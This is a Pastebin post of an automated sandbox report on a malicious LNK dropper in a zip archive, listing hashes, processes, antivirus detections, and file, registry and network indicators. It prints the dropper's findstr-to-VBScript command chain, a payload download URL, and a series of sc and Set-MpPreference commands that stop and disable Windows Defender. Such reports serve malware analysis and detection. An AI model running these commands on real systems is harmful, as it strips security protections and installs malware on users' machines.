Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: ""
- * MalScore: 10.0
- * File Name: "Zips_3b682290a0a9c09a213c11d1e83f87c3.zip"
- * File Size: 3456
- * File Type: "Zip archive data, at least v2.0 to extract"
- * SHA256: "fb4312187aabb7a3932bf8a3fe9e6cdf8cee2e2f13d33b3e1f36f87a6b937f29"
- * MD5: "3b682290a0a9c09a213c11d1e83f87c3"
- * SHA1: "a94b97c8d7bf646839d9ca71ff3efdac7c4f6ebc"
- * SHA512: "c18792605d5e89a44e367cdc02ab324eb724039877700cc874980fb57c0b2da87e7ff5ddc750f4c7ed135cc0eddad4baa6f3e3d5e110365c919c8b7d9c95ab9e"
- * CRC32: "7552F803"
- * SSDEEP: "96:VbK9cj8HEFXwWCCYZzYNeUiKuVBhz4+LnxoBl6Dx4rz:VbA2XphTNDnehk+1yl6W"
- * Process Execution:
- "cmd.exe",
- "cmd.exe",
- "findstr.exe",
- "wscript.exe",
- "NaFhI.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "powershell.exe",
- "svchost.exe",
- "services.exe",
- "lsass.exe"
- * Executed Commands:
- "\"C:\\Windows\\System32\\cmd.exe\" /c copy yciBx & (findstr \"mPmHc.*\" Readme_Print.doc.lnk > \"C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs\" & \"C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs\") & iEhgd",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Readme_Print.doc.lnk ",
- "findstr \"mPmHc.*\" Readme_Print.doc.lnk",
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs\"",
- "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs ",
- "C:\\Users\\user\\AppData\\Local\\Temp\\NaFhI.exe",
- "cmd.exe /c sc stop WinDefend",
- "cmd.exe /c sc delete WinDefend",
- "cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
- "cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true",
- "cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true",
- "cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true",
- "cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true",
- "cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true",
- "cmd.exe /c powershell Set-MpPreference -SevereThreatDefaultAction 6",
- "cmd.exe /c powershell Set-MpPreference -LowThreatDefaultAction 6",
- "cmd.exe /c powershell Set-MpPreference -ModerateThreatDefaultAction 6",
- "cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true",
- "C:\\Windows\\system32\\svchost.exe",
- "sc stop WinDefend",
- "sc delete WinDefend",
- "powershell Set-MpPreference -DisableRealtimeMonitoring $true",
- "powershell Set-MpPreference -DisableBehaviorMonitoring $true",
- "powershell Set-MpPreference -DisableBlockAtFirstSeen $true",
- "powershell Set-MpPreference -DisableIOAVProtection $true",
- "powershell Set-MpPreference -DisablePrivacyMode $true",
- "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true",
- "powershell Set-MpPreference -SevereThreatDefaultAction 6",
- "powershell Set-MpPreference -LowThreatDefaultAction 6",
- "powershell Set-MpPreference -ModerateThreatDefaultAction 6",
- "powershell Set-MpPreference -DisableScriptScanning $true",
- "C:\\Windows\\system32\\lsass.exe"
- * Signatures Detected:
- "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
- "Details":
- "IP": "172.217.5.78:443"
- "IP": "172.217.11.161:443"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "cmd.exe, PID 424"
- "Description": "Detected script timer window indicative of sleep style evasion",
- "Details":
- "Window": "WSH-Timer"
- "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
- "Details":
- "ioc": "http://crl.globalsign.net/root-r2.crl0"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: wscript.exe, pid: 2508, offset: 0x00000000, length: 0x00000040"
- "self_read": "process: wscript.exe, pid: 2508, offset: 0x000000f0, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2508, offset: 0x000001e8, length: 0x00000078"
- "self_read": "process: wscript.exe, pid: 2508, offset: 0x00018000, length: 0x00000020"
- "self_read": "process: wscript.exe, pid: 2508, offset: 0x00018058, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2508, offset: 0x000181a8, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2508, offset: 0x00018470, length: 0x00000010"
- "self_read": "process: wscript.exe, pid: 2508, offset: 0x00018640, length: 0x00000012"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Process": "NaFhI.exe -> cmd.exe"
- "Description": "File has been identified by 5 Antiviruses on VirusTotal as malicious",
- "Details":
- "ESET-NOD32": "LNK/Agent.AJ"
- "Sophos": "Troj/LnkDrop-B"
- "VBA32": "Trojan.Link.DoubleRun"
- "Zoner": "Probably LNKScript"
- "Rising": "Trojan.Obfus/VBS!1.B96F (CLASSIC)"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\NaFhI.exe"
- "Description": "Attempts to stop active services",
- "Details":
- "servicename": "WinDefend"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 6580148 times"
- "Spam": "NaFhI.exe (2212) called API GetSystemTimeAsFileTime 258088 times"
- "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
- "Details":
- "modified_name": "svchost.exe",
- "modified_path": "C:\\Users\\user\\AppData\\Local\\Temp\\NaFhI.exe",
- "original_name": "svchost.exe",
- "original_path": "C:\\Windows\\system32\\svchost.exe"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436a4d.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43bd00.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436d5a.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436f6d.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF4370a6.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d51c.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d5a9.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF437d58.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d9ef.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF438046.TMP"
- "Description": "A wscript.exe process commonly used in script or document file downloaders initiated network activity",
- "Details":
- "http_request": "wscript.exe_InternetCrackUrlW_https://docs.google.com/uc?export=download&id=1eum9c8esmtdi0ggcoz2f0vdpz_qq-u-5"
- "http_request": "wscript.exe_InternetCrackUrlW_https://doc-08-9s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/u4fkj9o4s7g6u1s9fves9fg0q35rslbe/1565035200000/01776086037526790667/*/1eum9c8esmtdi0ggcoz2f0vdpz_qq-u-5?e=download"
- "http_request": "wscript.exe_InternetCrackUrlA_https://docs.google.com"
- "http_request": "wscript.exe_InternetCrackUrlA_https://doc-08-9s-docs.googleusercontent.com"
- "Description": "Attempts to modify proxy settings",
- "Details":
- "Description": "Attempts to disable Windows Defender",
- "Details":
- * Started Service:
- "KeyIso"
- * Mutexes:
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "Local\\!IETld!Mutex",
- "Global\\CLR_CASOFF_MUTEX",
- "Global\\838B6C9EB27932960"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs",
- "C:\\Users\\user\\AppData\\Local\\Temp\\NaFhI.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\~DFB16BD84282157EAF.TMP",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7E3PQJ5WHV6MLRHPBRPS.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436a4d.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\TD1UKG17J5GXDRN5BU1T.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43bd00.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\H0LZ2OK9UEYG88G5J3XN.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436d5a.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\YY3IJHVTOT3SB57LSQPN.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436f6d.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\T4LQLIMM7CO9W9VMIX7D.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF4370a6.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\0TJLF8DOXAPTJM2HTVAU.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d51c.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\8QJ5RMGOL5Y5M38QB6QN.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d5a9.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\IAHJINXL1U49RNKR6KHS.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF437d58.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\9JQU92UM68VH8YZ2O8QP.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d9ef.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LJJIB65CTJMHNRR24J53.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF438046.TMP"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs",
- "C:\\Users\\user\\AppData\\Local\\Temp\\~DFB16BD84282157EAF.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436a4d.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1396.4418890",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1396.4418890",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1396.4418890",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43bd00.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1924.4439453",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1924.4439453",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1924.4439453",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436d5a.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.2972.4420625",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2972.4420625",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.2972.4420625",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436f6d.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.2464.4421359",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2464.4421359",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.2464.4421359",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF4370a6.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.2908.4422453",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2908.4422453",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.2908.4422453",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d51c.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.788.4445593",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.788.4445609",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.788.4445609",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d5a9.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.2872.4445781",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2872.4445781",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.2872.4445781",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF437d58.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.832.4426843",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.832.4426843",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.832.4426843",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d9ef.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.3084.4446828",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3084.4446843",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.3084.4446843",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF438046.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.3140.4427328",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3140.4427328",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.3140.4427328"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScanOnRealtimeEnable",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL"
- * DNS Communications:
- "type": "A",
- "request": "doc-08-9s-docs.googleusercontent.com",
- "answers":
- "data": "googlehosted.l.googleusercontent.com",
- "type": "CNAME"
- "data": "172.217.11.161",
- "type": "A"
- * Domains:
- "ip": "172.217.11.65",
- "domain": "doc-08-9s-docs.googleusercontent.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Add Comment
Please, Sign In to add comment